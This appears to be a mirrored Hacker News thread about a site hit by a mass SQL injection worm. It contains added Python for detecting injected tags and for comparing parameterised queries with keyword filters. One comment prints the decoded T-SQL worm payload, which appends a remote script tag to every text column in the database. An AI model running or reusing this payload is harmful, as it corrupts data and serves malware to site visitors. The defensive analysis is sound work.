科技回声 (Tech Echo)
A tech news platform built on Next.js, providing global tech news and discussion content.
© 2025 科技回声. All rights reserved.

SQL "development" gone horribly wrong...

11 points, by avner, almost 17 years ago

3 comments

dizm, almost 17 years ago
Decoded:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
  EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.suppadw.com/b.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
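Reading the decoded payload against the SQL Server system catalog: sysobjects rows with xtype 'u' are the user tables, and the syscolumns xtype values 99, 35, 231 and 167 are the ntext, text, nvarchar and varchar types, so the cursor visits every text-like column of every user table and appends the script tag to each cell. The block below is an added example, not code from the thread, showing the defender's counterpart of that walk on a constructed SQLite database standing in for the SQL Server instance: enumerate the same kind of columns, locate cells that carry an appended script tag, and strip it with a parameterised UPDATE. The function names, the sample tables and the injected.example host are my own assumptions.

```python
import re
import sqlite3

# Tail the payload appends to every cell: a <script src=...></script> at the end of the value.
INJECTED_TAG = re.compile(r"<script\s+src=[^>]*></script>\s*$", re.IGNORECASE)

# Declared column types treated as text-like. Stands in for the syscolumns.xtype filter
# (99 ntext, 35 text, 231 nvarchar, 167 varchar) used by the decoded payload.
TEXT_TYPES = {"varchar", "nvarchar", "char", "nchar", "text", "ntext"}


def quote_ident(name):
    """Double-quote an identifier; table and column names cannot be bound as parameters."""
    return '"' + name.replace('"', '""') + '"'


def user_tables(conn):
    """Counterpart of the payload's sysobjects query: every user table in the database."""
    rows = conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'"
    )
    return [row[0] for row in rows]


def text_columns(conn, table):
    """Counterpart of the syscolumns filter: columns whose declared type is text-like."""
    cols = []
    # PRAGMA table_info rows are (cid, name, type, notnull, dflt_value, pk).
    for _cid, name, decl_type, *_rest in conn.execute(f"PRAGMA table_info({quote_ident(table)})"):
        base_type = (decl_type or "").lower().split("(")[0].strip()
        if base_type in TEXT_TYPES:
            cols.append(name)
    return cols


def find_injected(conn):
    """Walk every text-like column of every user table; return (table, column, rowid, value) hits."""
    hits = []
    for table in user_tables(conn):
        for col in text_columns(conn, table):
            sql = f"SELECT rowid, {quote_ident(col)} FROM {quote_ident(table)}"
            for rowid, value in conn.execute(sql):
                if isinstance(value, str) and INJECTED_TAG.search(value):
                    hits.append((table, col, rowid, value))
    return hits


def strip_injected(conn):
    """Remove the appended tag from each hit (value bound as a parameter); return cells cleaned."""
    cleaned = 0
    for table, col, rowid, value in find_injected(conn):
        conn.execute(
            f"UPDATE {quote_ident(table)} SET {quote_ident(col)} = ? WHERE rowid = ?",
            (INJECTED_TAG.sub("", value), rowid),
        )
        cleaned += 1
    conn.commit()
    return cleaned


def build_sample_db():
    """Constructed sample: two user tables, three cells carrying the appended tag (placeholder host)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name VARCHAR(255), price REAL);
        CREATE TABLE news (id INTEGER PRIMARY KEY, title NVARCHAR(200), body TEXT);
        """
    )
    tag = "<script src=http://injected.example/b.js></script>"  # constructed placeholder host
    conn.executemany("INSERT INTO products (name, price) VALUES (?, ?)",
                     [("Widget" + tag, 9.99), ("Gadget", 19.99)])
    conn.executemany("INSERT INTO news (title, body) VALUES (?, ?)",
                     [("Launch day" + tag, "Details here." + tag), ("Quiet week", "Nothing new.")])
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    for hit in find_injected(db):
        print("injected:", hit[:3])
    print("cells cleaned:", strip_injected(db))
    print("remaining hits:", find_injected(db))
```

Two caveats follow from the payload itself. It runs every value through RTRIM(CONVERT(VARCHAR(4000), ...)) before appending, so trailing whitespace and anything beyond 4000 characters in the original cell is already gone and scrubbing cannot bring it back; a backup taken before the injection is the better source of truth. And scrubbing without closing the injection point only restores the state the worm found, so the cleanup belongs after the fix, not instead of it.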
PStamatiou, almost 17 years ago
shared hosting? get your own box, turn off apache for a while and go through code with a fine tooth comb.
Comment #239107 not loaded
Comment #239174 not loaded
sabat, almost 17 years ago
- all web input needs to run thru the same filter
- that filter disallows SQL keywords
- you're done

If this guy wasn't on a shared host, he could just install mod_security and its default config should take care of it. Presuming Apache of course.
Comment #239205 not loaded
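As an added example that is not part of the thread, the block below puts three things side by side on a constructed SQLite table (a stand-in for the SQL Server database in the story): the string-concatenation pattern that lets a payload like the decoded one run at all, the same lookup with the value bound as a parameter, and a keyword blocklist of the kind proposed in the comment above. The inputs are ordinary product names, one of them containing an apostrophe and one containing the word "Select"; the function names and sample data are my own assumptions.

```python
import re
import sqlite3


def build_catalog():
    """Constructed sample table: product names a public search would run against."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name VARCHAR(255))")
    conn.executemany("INSERT INTO products (name) VALUES (?)", [
        ("Widget",), ("O'Brien's Widget",), ("Select Comfort mattress",),
    ])
    conn.commit()
    return conn


def search_concat(conn, term):
    """The pattern behind the story: the request value is spliced into the SQL text,
    so anything in it that parses as SQL (even a plain apostrophe) changes the statement."""
    sql = "SELECT name FROM products WHERE name = '" + term + "'"
    return [row[0] for row in conn.execute(sql)]


def search_param(conn, term):
    """Same lookup with a bound parameter: the value never becomes part of the statement text."""
    rows = conn.execute("SELECT name FROM products WHERE name = ?", (term,))
    return [row[0] for row in rows]


# Blocklist of the kind proposed in the thread: reject input containing SQL keywords.
SQL_KEYWORDS = re.compile(
    r"\b(select|insert|update|delete|drop|exec|declare|cursor|union)\b", re.IGNORECASE
)


def keyword_filter_rejects(value):
    """True if the blocklist filter would refuse this input."""
    return SQL_KEYWORDS.search(value) is not None


def run_search(search_fn, conn, term):
    """Run a search function and report ('ok', rows) or ('error', message) instead of raising."""
    try:
        return ("ok", search_fn(conn, term))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


# Head of the decoded payload quoted in the thread, used here only as filter input.
WORM_HEAD = ("DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
             "SELECT a.name,b.name FROM sysobjects a,syscolumns b")


if __name__ == "__main__":
    catalog = build_catalog()
    for term in ("Widget", "O'Brien's Widget", "Select Comfort mattress"):
        print(repr(term))
        print("  concatenated: ", run_search(search_concat, catalog, term))
        print("  parameterised:", run_search(search_param, catalog, term))
        print("  filter rejects:", keyword_filter_rejects(term))
    print("filter rejects worm payload:", keyword_filter_rejects(WORM_HEAD))
```

Run as is, the concatenated search fails on "O'Brien's Widget" with a syntax error: the apostrophe in the data is read as SQL, which is exactly the property the worm relies on. The parameterised search returns the row for every input, including the one with "Select" in it, while the keyword filter refuses that legitimate name and also refuses the worm payload. Parameterisation removes the problem at the point where data and code are separated; a keyword filter in front of it is a second line, not a replacement.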